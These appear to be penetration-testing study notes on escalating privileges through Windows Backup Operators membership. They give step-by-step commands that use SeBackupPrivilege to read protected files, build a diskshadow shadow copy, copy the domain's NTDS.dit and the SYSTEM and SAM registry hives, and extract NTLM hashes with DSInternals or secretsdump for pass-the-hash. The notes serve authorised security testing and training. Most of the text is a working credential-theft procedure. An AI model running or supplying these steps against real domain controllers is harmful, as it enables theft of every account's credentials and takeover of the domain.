Backup Operators

• built-in groups - https://ss64.com/nt/syntax-security_groups.html
• privileged accounts and groups - https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory

Windows Built-in Groups to focus on

• Backup Operators
• Event Log Readers
• DnsAdmins
• Hyper-V Administrators
• Print Operators
• Server Operators
• We should always check these groups and include a list of each group's members as an appendix in our report for the client to review and determine if access is still necessary.

Backup Operators

• Main trick - https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
• Check privileges
  • whoami /group | net user _USERNAME_
    • Backup Operators
    • Backup Operators will provide the SeBackupPrivilege / SeRestorePrivilege
    • SeBackupPrivilege allows us to traverse any folder and list the folder contents
      • This allows us to copy any file/folder even if ACLs dont permit us to.
    • Cant do normal copy. we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
• Download the PoC - https://github.com/giuliano108/SeBackupPrivilege
• Import Libraries
  • Import-Module .\SeBackupPrivilegeUtils.dll
  • Import-Module .\SeBackupPrivilegeCmdLets.dll
• Verifying SeBackupPrivilege is Enabled (might require an elevated shell)
  • whoami /priv
  • Set-SeBackupPrivilege
  • Get-SeBackupPrivilege
• Checking access
  • now, we can cd to any folder but cant cat a file
• Copying a file
  • Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
  • cat .\Contract.txt
    • now we can see the contents
• NOTE: If a folder or file has an explicit deny entry for our current user or a group they belong to, this will prevent us from accessing it, even if the FILE_FLAG_BACKUP_SEMANTICS flag is specified.

Attacking a Domain Controller - Copying NTDS.dit

• The AD DB NTDS.dit is a very attractive target - it contains the NTLM hashes for all user and computer objects in the domain.
• But, this file is locked and is also not accessible by unprivileged users.
• using diskshadow utility to create a shadow copy of the C drive and expose it as E drive. The NTDS.dit in this shadow copy won't be in use by the system.
• Creating a shadow copy of C
  • diskshadow.exe
  • DISKSHADOW> set verbose on
  • DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
  • DISKSHADOW> set context persistent
  • DISKSHADOW> begin backup
  • DISKSHADOW> add volume C: alias cdrive
  • DISKSHADOW> create
  • DISKSHADOW> expose %cdrive% E:
  • DISKSHADOW> end backup
  • DISKSHADOW> exit
  • dir E:
• Copying NTDS.dit Locally
  • Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
  • on CMD.exe
  • reg save HKLM\SYSTEM SYSTEM.SAV
  • reg save HKLM\SAM SAM.SAV
• Extracting Credentials from NTDS.dit
  • done with tool such as secretsdump.py or the PowerShell DSInternals module to extract all Active Directory account credentials
  • Using DSInternals
    • Import-Module .\DSInternals.psd1
    • $key = Get-BootKey -SystemHivePath .\SYSTEM
    • Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
  • Using secretsdump
    • secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
  • Provides NTLM hashes that can be used for Pass-the-Hash or cracked later

Robocopy

Copying Files with Robocopy

• ROBOCOPY
• After diskshadow
  • robocopy /B E:\Windows\NTDS .\ntds ntds.dit